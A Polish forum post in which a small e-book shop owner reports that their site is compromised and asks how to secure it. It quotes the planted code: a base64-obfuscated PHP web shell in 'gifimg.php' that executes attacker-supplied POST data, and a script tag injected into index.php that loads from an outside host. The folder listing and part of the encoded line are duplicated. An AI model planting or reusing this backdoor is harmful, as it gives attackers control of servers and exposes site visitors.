Otóż mam problem.
Posiadam stronę www. Taki mini sklep z e-bookami.
Problem polega na tym, że najwidoczniej nie jest odpowiednio bezpieczny, ponieważ codziennie wchodząc na stronę i zaglądając w źródło strony dodaje się niespodziewana linijka. Treści teraz nie podam, ale zaczyna się od <script>.
Pytania brzmią:
1. Dlaczego taka linijka się sama dodaje.
2. Jak zabezpieczyć kod php i mysql.
3. Słyszałem gdzieś, że to wina CHMOD'ów. Jakie ustawić dla danego pliku:
Kod
FOLDER GŁÓWNY:
index.php
style.css
IMAGES
obrazek1.png
obrazek2.png
obrazek3.png
PANEL
plik1.php
plik2.php
plik3.php
plik4.php
plik5.php
.
.
.itp
STRONA
LICZNIK-licznik.txt
plik1.php
plik2.php
plik3.php
plik4.php
plik5.php
.
.
.itp
LEGENDA:
NAPISANE DRUKOWANYMI LITERAMI=folder
napisane małymi literami=plik z rozszeżeniem(.php, .css, .txt)
index.php
style.css
IMAGES
obrazek1.png
obrazek2.png
obrazek3.png
PANEL
plik1.php
plik2.php
plik3.php
plik4.php
plik5.php
.
.
.itp
STRONA
LICZNIK-licznik.txt
plik1.php
plik2.php
plik3.php
plik4.php
plik5.php
.
.
.itp
LEGENDA:
NAPISANE DRUKOWANYMI LITERAMI=folder
napisane małymi literami=plik z rozszeżeniem(.php, .css, .txt)
Proszę o pomoc
Z góry dziękuje.
Chciałbym dodać, że dodatkowo w folderze images tworzy się plik o nazwie gifimg.php o treści:
Kod
<?php eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vs
c2UgZGllKCc0MDQgTm90IEZvdW5kJyk7'));?>
c2UgZGllKCc0MDQgTm90IEZvdW5kJyk7'));?>
W pliku index wstawia się kod o treści:
Kod
<script src=http://brekisoftgames.extra.hu/e107_docs/forum_viewtopic.php ></script>